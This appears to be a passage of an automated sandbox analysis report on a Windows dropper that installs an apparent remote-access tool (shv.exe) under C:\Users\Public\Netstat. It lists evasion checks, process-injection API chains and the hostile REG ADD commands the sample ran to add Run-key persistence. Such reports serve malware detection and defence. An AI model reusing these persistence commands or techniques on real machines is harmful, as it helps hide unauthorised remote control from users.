                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,5_2_11023BA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_11024280
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11112670 IsIconic,GetTickCount,5_2_11112670
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,8_2_1115B1D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,8_2_11139090
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,8_2_11113290
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,8_2_110CB2B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,8_2_110CB2B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,8_2_110254A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,8_2_110258F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,8_2_11023BA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,8_2_11024280
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11112670 IsIconic,GetTickCount,8_2_11112670
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,8_2_111229D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,8_2_111229D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,8_2_110C0BB0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,8_2_1115ADD0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,8_2_1115ADD0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_11143570
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Delayed program exit found
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110B8200 Sleep,ExitProcess,5_2_110B8200
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110B8200 Sleep,ExitProcess,8_2_110B8200
                                Source: C:\Users\Public\Netstat\shv.exeWindow / User API: threadDelayed 453Jump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeWindow / User API: threadDelayed 7875Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decisiongraph_5-54313
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decisiongraph_5-58147
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decisiongraph_5-58183
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\Public\Netstat\shv.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_5-58271
                                Source: C:\Users\Public\Netstat\shv.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-58079
                                Source: C:\Users\Public\Netstat\shv.exeAPI coverage: 6.4 %
                                Source: C:\Users\Public\Netstat\shv.exeAPI coverage: 2.6 %
                                Source: C:\Users\Public\Netstat\shv.exe TID: 2336Thread sleep time: -76750s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exe TID: 4480Thread sleep time: -45300s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exe TID: 2336Thread sleep time: -1968750s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\Public\Netstat\shv.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1940BC
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1AB190
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1BFCA0 FindFirstFileExA,0_2_00007FF6FE1BFCA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102D330
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,8_2_11065890
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,8_2_1106A0A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,8_2_111266E0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,8_2_1110AFD0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1B16A4 VirtualQuery,GetSystemInfo,0_2_00007FF6FE1B16A4
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.0.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: shv.exe, 00000005.00000002.4131206311.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132118742.00000000037C6000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4131206311.0000000000C15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: TCCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: shv.exe, 00000008.00000002.1693805222.00000000004C0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000008.00000003.1693622715.00000000004BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
                                Source: shv.exe, 00000009.00000003.1804917331.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000B.00000003.1885767916.0000000000D9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: shv.exe, 0000000E.00000003.1967618467.00000000007AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzz
                                Source: C:\Users\Public\Netstat\shv.exeAPI call chain: ExitProcess graph end nodegraph_5-54375
                                Source: C:\Users\Public\Netstat\shv.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Netstat\shv.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Netstat\shv.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Netstat\shv.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6FE1B76D8
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,5_2_11147750
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,5_2_11029590
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1C0D20 GetProcessHeap,0_2_00007FF6FE1C0D20
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6FE1B76D8
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1B3354 SetUnhandledExceptionFilter,0_2_00007FF6FE1B3354
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1B2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6FE1B2510
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1B3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6FE1B3170
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,5_2_11093080
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,5_2_110310C0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_11161D01
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_1116DD89
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,8_2_11093080
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,8_2_110310C0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_11161D01
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1116DD89
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,5_2_110F4560
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1AB190
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,5_2_1111FCA0
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exeJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,5_2_1109E190
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,5_2_1109E910
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: shv.exe, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Shell_TrayWnd
                                Source: shv.exe, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Progman
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE19DC70 cpuid 0_2_00007FF6FE19DC70
                                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF6FE1AA2CC
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_11173A35
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_11173D69
                                Source: C:\Users\Public\Netstat\shv.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173CC6
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoA,5_2_1116B38E
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_11173933
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_111739DA
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_1117383E
                                Source: C:\Users\Public\Netstat\shv.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173D2D
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_11173C06
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,8_2_11173D69
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoA,8_2_1116B38E
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,8_2_11173933
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,8_2_111739DA
                                Source: C:\Users\Public\Netstat\shv.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_1117383E
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,8_2_11173A35
                                Source: C:\Users\Public\Netstat\shv.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_11173D2D
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,8_2_11173C06
                                Source: C:\Users\Public\Netstat\shv.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_11173CC6
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
